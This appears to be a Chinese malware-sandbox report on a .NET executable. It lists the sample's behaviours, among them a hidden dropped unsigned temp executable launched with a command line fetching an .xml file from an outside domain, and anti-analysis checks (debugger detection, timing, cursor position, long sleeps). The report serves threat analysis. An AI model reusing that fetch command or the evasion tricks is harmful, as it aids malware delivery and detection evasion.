1, 你可以上传任何文件,但是文件的尺寸不能超过20兆。
2, 我们支持RAR或ZIP格式的自动解压缩,但压缩文件中不能包含超过20个文件。
3, 我们可以识别并检测密码为 'infected' 或 'virus' 的压缩文件包。
选择语言
服务器负载
1, 你可以上传任何文件,但是文件的尺寸不能超过20兆。
2, 我们支持RAR或ZIP格式的自动解压缩,但压缩文件中不能包含超过20个文件。
3, 我们可以识别并检测密码为 'infected' 或 'virus' 的压缩文件包。
| 安全评分:75 |
| 行为列表 |
| 基本信息 | |
|---|---|
| MD5: | b59a74e5e2b6f791816c5a05b934fe5f |
| 文件类型: | EXE |
| 出品公司: | |
| 版本: | 1.4.0.0---1.4.0.0 |
| 壳或编译器信息: | COMPILER:Microsoft Visual C# / Basic .NET |
| 关键行为 | |
|---|---|
| 行为描述: | 设置特殊文件夹属性 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5 | |
| C:\Documents and Settings\Administrator\Local Settings\History | |
| C:\Documents and Settings\Administrator\Local Settings\History\History.IE5 | |
| C:\Documents and Settings\Administrator\Cookies | |
| 行为描述: | 直接获取CPU时钟 |
| 详细信息: | EAX = 0x1ad2cca4, EDX = 0x000000b5 |
| EAX = 0x1ad2ccf0, EDX = 0x000000b5 | |
| EAX = 0x2aae6876, EDX = 0x000000b5 | |
| EAX = 0x2aae68c2, EDX = 0x000000b5 | |
| EAX = 0x2d36384b, EDX = 0x000000b5 | |
| EAX = 0x2d363897, EDX = 0x000000b5 | |
| EAX = 0x2d3638e3, EDX = 0x000000b5 | |
| EAX = 0x2d36392f, EDX = 0x000000b5 | |
| EAX = 0x3a5ed585, EDX = 0x000000b5 | |
| EAX = 0x3a5ed5d1, EDX = 0x000000b5 | |
| 行为描述: | 获取TickCount值 |
| 详细信息: | TickCount = 279000, SleepMilliseconds = 60000. |
| TickCount = 279031, SleepMilliseconds = 60000. | |
| TickCount = 279125, SleepMilliseconds = 60000. | |
| TickCount = 279203, SleepMilliseconds = 60000. | |
| TickCount = 279218, SleepMilliseconds = 60000. | |
| TickCount = 279234, SleepMilliseconds = 60000. | |
| TickCount = 279343, SleepMilliseconds = 60000. | |
| TickCount = 279359, SleepMilliseconds = 60000. | |
| TickCount = 279375, SleepMilliseconds = 60000. | |
| TickCount = 279406, SleepMilliseconds = 60000. | |
| TickCount = 279437, SleepMilliseconds = 60000. | |
| TickCount = 279453, SleepMilliseconds = 60000. | |
| TickCount = 279468, SleepMilliseconds = 60000. | |
| TickCount = 279484, SleepMilliseconds = 60000. | |
| TickCount = 279515, SleepMilliseconds = 60000. | |
| 进程行为 | |
|---|---|
| 行为描述: | 隐藏窗口创建进程 |
| 详细信息: | ImagePath = , CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\c8774355.tmp" https://lkk5ko0vmxsvnrwqkdgf.fulizhitongche.com/wdFU4RJE0bQofhtFcP5M.xml --resolve lkk5ko0vmxsvnrwqkdgf.fulizhitongche.com:443: -k |
| 行为描述: | 创建本地线程 |
| 详细信息: | TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2468, StartAddress = 79F0237F, Parameter = 00000000 |
| TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2472, StartAddress = 79F91FCF, Parameter = 001A5780 | |
| TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2508, StartAddress = 4AEA7456, Parameter = 00000000 | |
| TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2600, StartAddress = 77DC845A, Parameter = 00000000 | |
| TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2608, StartAddress = 77E56C7D, Parameter = 001E3430 | |
| TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2612, StartAddress = 769AE43B, Parameter = 001E5D10 | |
| TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2616, StartAddress = 6359727B, Parameter = 001C7860 | |
| TargetProcess: %temp%\****.exe, InheritedFromPID = 2000, ProcessID = 2452, ThreadID = 2644, StartAddress = 79F91FCF, Parameter = 001E6680 | |
| TargetProcess: c8774355.tmp, InheritedFromPID = 2452, ProcessID = 2664, ThreadID = 2672, StartAddress = 004FAC27, Parameter = 001B2CA8 | |
| 行为描述: | 创建新文件进程 |
| 详细信息: | [0x00000a68]ImagePath = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\c8774355.tmp, CmdLine = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\c8774355.tmp" https://lkk5ko0vmxsvnrwqkdgf.fulizhitongche.com/wdFU4RJE0bQofhtFcP5M.xml --resolve lkk5ko0vmxsvnrwqkdgf.fulizhitongche.com:443: -k |
| 文件行为 | |
|---|---|
| 行为描述: | 创建文件 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Temp\c8774355.tmp |
| 行为描述: | 创建可执行文件 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Temp\c8774355.tmp |
| 行为描述: | 覆盖已有文件 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Application Data\GDIPFONTCACHEV1.DAT |
| 行为描述: | 查找文件 |
| 详细信息: | FileName = C:\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll |
| FileName = C:\WINDOWS\Microsoft.NET\Framework\\* | |
| FileName = C:\WINDOWS | |
| FileName = C:\WINDOWS\WinSxS | |
| FileName = C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.4053_x-ww_e6967989\MSVCR80.dll | |
| FileName = C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI | |
| FileName = C:\Documents and Settings\Administrator\Local Settings\Temp | |
| FileName = C:\Documents and Settings\Administrator\Local Settings\%temp% | |
| FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\****.exe | |
| FileName = C:\Documents and Settings | |
| FileName = C:\Documents and Settings\Administrator | |
| FileName = C:\Documents and Settings\Administrator\Local Settings | |
| FileName = C:\Documents and Settings\Administrator\Local Settings\%temp%\996E.INI | |
| FileName = C:\WINDOWS\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI | |
| FileName = C:\WINDOWS\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI | |
| 行为描述: | 设置特殊文件夹属性 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files |
| C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5 | |
| C:\Documents and Settings\Administrator\Local Settings\History | |
| C:\Documents and Settings\Administrator\Local Settings\History\History.IE5 | |
| C:\Documents and Settings\Administrator\Cookies | |
| 行为描述: | 修改文件内容 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Temp\c8774355.tmp ---> Offset = 0 |
| 网络行为 | |
|---|---|
| 行为描述: | 建立到一个指定的套接字连接 |
| 详细信息: | URL: lk****om, IP: **.133.40.**:128, SOCKET = 0x00000784 |
| 行为描述: | 按名称获取主机地址 |
| 详细信息: | GetAddrInfoW: cl****om |
| GetAddrInfoW: co****io | |
| GetAddrInfoW: au****om | |
| GetAddrInfoW: lk****om | |
| 其他行为 | |
|---|---|
| 行为描述: | 检测自身是否被调试 |
| 详细信息: | IsDebuggerPresent |
| 行为描述: | 创建互斥体 |
| 详细信息: | CTF.LBES.MutexDefaultS-* |
| CTF.Compart.MutexDefaultS-* | |
| CTF.Asm.MutexDefaultS-* | |
| CTF.Layouts.MutexDefaultS-* | |
| CTF.TMD.MutexDefaultS-* | |
| CTF.TimListCache.FMPDefaultS-*MUTEX.DefaultS-* | |
| Local\!PrivacIE!SharedMemory!Mutex | |
| Local\ZonesCounterMutex | |
| Local\ZoneAttributeCacheCounterMutex | |
| Local\ZonesCacheCounterMutex | |
| Local\ZonesLockedCacheCounterMutex | |
| Global\.net clr networking | |
| MSCTF.Shared.MUTEX.IOH | |
| MSCTF.Shared.MUTEX.IJJ | |
| 行为描述: | 创建事件对象 |
| 详细信息: | EventName = Global\CorDBIPCSetupSyncEvent_2452 |
| EventName = MSCTF.SendReceive.Event.IJJ.IC | |
| EventName = MSCTF.SendReceiveConection.Event.IJJ.IC | |
| 行为描述: | 打开互斥体 |
| 详细信息: | ShimCacheMutex |
| Global\CLR_CASOFF_MUTEX | |
| Local\WininetStartupMutex | |
| Local\_!MSFTHISTORY!_ | |
| Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5! | |
| Local\c:!documents and settings!administrator!cookies! | |
| Local\c:!documents and settings!administrator!local settings!history!history.ie5! | |
| Local\WininetConnectionMutex | |
| Local\WininetProxyRegistryMutex | |
| Local\!IETld!Mutex | |
| Global\.net clr networking | |
| CtfmonInstMutexDefaultS-* | |
| 行为描述: | 查找指定窗口 |
| 详细信息: | NtUserFindWindowEx: [Class,Window] = [MS_AutodialMonitor,] |
| NtUserFindWindowEx: [Class,Window] = [MS_WebCheckMonitor,] | |
| NtUserFindWindowEx: [Class,Window] = [Shell_TrayWnd,] | |
| NtUserFindWindowEx: [Class,Window] = [CicLoaderWndClass,] | |
| 行为描述: | 窗口信息 |
| 详细信息: | Pid = 2452, Hwnd=0x1036a, Text = 正在加载内容,请稍后..., ClassName = WindowsForms10.STATIC.app.0.33c0d9d. |
| Pid = 2452, Hwnd=0x2035e, Text = Start, ClassName = WindowsForms10.Window.8.app.0.33c0d9d. | |
| Pid = 2452, Hwnd=0x3035e, Text = Unhandled exception has occurred in your application. If you click Continue, the application will ignore this error and attempt to continue. If you click Quit, the application will close immediately. Value cannot be null. Parameter name: s., ClassName = WindowsForms10.STATIC.app.0.33c0d9d. | |
| Pid = 2452, Hwnd=0x50436, Text = &Details, ClassName = WindowsForms10.BUTTON.app.0.33c0d9d. | |
| Pid = 2452, Hwnd=0x20438, Text = &Continue, ClassName = WindowsForms10.BUTTON.app.0.33c0d9d. | |
| Pid = 2452, Hwnd=0x1043a, Text = &Quit, ClassName = WindowsForms10.BUTTON.app.0.33c0d9d. | |
| Pid = 2452, Hwnd=0x1043c, Text = See the end of this message for details on invoking just-in-time (JIT) debugging instead of this dialog box. ************** Exception Text ************** System.ArgumentNullException: Value cannot be null. Parameter name: s at System.IO.StringReade, ClassName = WindowsForms10.EDIT.app.0.33c0d9d. | |
| Pid = 2452, Hwnd=0x2036a, Text = Microsoft .NET Framework, ClassName = WindowsForms10.Window.8.app.0.33c0d9d. | |
| 行为描述: | 获取TickCount值 |
| 详细信息: | TickCount = 279000, SleepMilliseconds = 60000. |
| TickCount = 279031, SleepMilliseconds = 60000. | |
| TickCount = 279125, SleepMilliseconds = 60000. | |
| TickCount = 279203, SleepMilliseconds = 60000. | |
| TickCount = 279218, SleepMilliseconds = 60000. | |
| TickCount = 279234, SleepMilliseconds = 60000. | |
| TickCount = 279343, SleepMilliseconds = 60000. | |
| TickCount = 279359, SleepMilliseconds = 60000. | |
| TickCount = 279375, SleepMilliseconds = 60000. | |
| TickCount = 279406, SleepMilliseconds = 60000. | |
| TickCount = 279437, SleepMilliseconds = 60000. | |
| TickCount = 279453, SleepMilliseconds = 60000. | |
| TickCount = 279468, SleepMilliseconds = 60000. | |
| TickCount = 279484, SleepMilliseconds = 60000. | |
| TickCount = 279515, SleepMilliseconds = 60000. | |
| 行为描述: | 获取光标位置 |
| 详细信息: | CursorPos = (80,18468), SleepMilliseconds = 60000. |
| CursorPos = (6373,26501), SleepMilliseconds = 60000. | |
| CursorPos = (19208,15725), SleepMilliseconds = 60000. | |
| CursorPos = (11517,29359), SleepMilliseconds = 60000. | |
| CursorPos = (27001,24465), SleepMilliseconds = 60000. | |
| CursorPos = (5744,28146), SleepMilliseconds = 60000. | |
| CursorPos = (23320,16828), SleepMilliseconds = 60000. | |
| CursorPos = (10000,492), SleepMilliseconds = 60000. | |
| CursorPos = (3034,11943), SleepMilliseconds = 60000. | |
| CursorPos = (4866,5437), SleepMilliseconds = 60000. | |
| CursorPos = (32430,14605), SleepMilliseconds = 60000. | |
| CursorPos = (3941,154), SleepMilliseconds = 60000. | |
| CursorPos = (331,12383), SleepMilliseconds = 60000. | |
| CursorPos = (17460,18717), SleepMilliseconds = 60000. | |
| CursorPos = (19757,19896), SleepMilliseconds = 60000. | |
| 行为描述: | 打开事件 |
| 详细信息: | Global\CLR_PerfMon_StartEnumEvent |
| \KernelObjects\LowMemoryCondition | |
| HookSwitchHookEnabledEvent | |
| MSFT.VSA.COM.DISABLE.2452 | |
| MSFT.VSA.IEC.STATUS.6c736db0 | |
| \SECURITY\LSA_AUTHENTICATION_INITIALIZED | |
| CTF.ThreadMIConnectionEvent.000007E8.00000000.00000010 | |
| CTF.ThreadMarshalInterfaceEvent.000007E8.00000000.00000010 | |
| MSCTF.SendReceiveConection.Event.IOH.IC | |
| MSCTF.SendReceive.Event.IOH.IC | |
| 行为描述: | 可执行文件签名信息 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Temp\c8774355.tmp(签名验证: 未通过) |
| 行为描述: | 调用Sleep函数 |
| 详细信息: | [1]: MilliSeconds = 60000. |
| [1]: MilliSeconds = 0. | |
| [2]: MilliSeconds = 0. | |
| [3]: MilliSeconds = 0. | |
| [4]: MilliSeconds = 0. | |
| [5]: MilliSeconds = 0. | |
| [6]: MilliSeconds = 0. | |
| [7]: MilliSeconds = 0. | |
| [8]: MilliSeconds = 0. | |
| [9]: MilliSeconds = 0. | |
| [10]: MilliSeconds = 0. | |
| 行为描述: | 隐藏指定窗口 |
| 详细信息: | [Window,Class] = [Start,WindowsForms10.Window.8.app.0.33c0d9d] |
| 行为描述: | 可执行文件MD5 |
| 详细信息: | C:\Documents and Settings\Administrator\Local Settings\Temp\c8774355.tmp ---> a6b32f2e39b4d145b1d49811c080aef6 |
| 行为描述: | 直接获取CPU时钟 |
| 详细信息: | EAX = 0x1ad2cca4, EDX = 0x000000b5 |
| EAX = 0x1ad2ccf0, EDX = 0x000000b5 | |
| EAX = 0x2aae6876, EDX = 0x000000b5 | |
| EAX = 0x2aae68c2, EDX = 0x000000b5 | |
| EAX = 0x2d36384b, EDX = 0x000000b5 | |
| EAX = 0x2d363897, EDX = 0x000000b5 | |
| EAX = 0x2d3638e3, EDX = 0x000000b5 | |
| EAX = 0x2d36392f, EDX = 0x000000b5 | |
| EAX = 0x3a5ed585, EDX = 0x000000b5 | |
| EAX = 0x3a5ed5d1, EDX = 0x000000b5 | |
| 运行截图 |
|---|
 |
首页
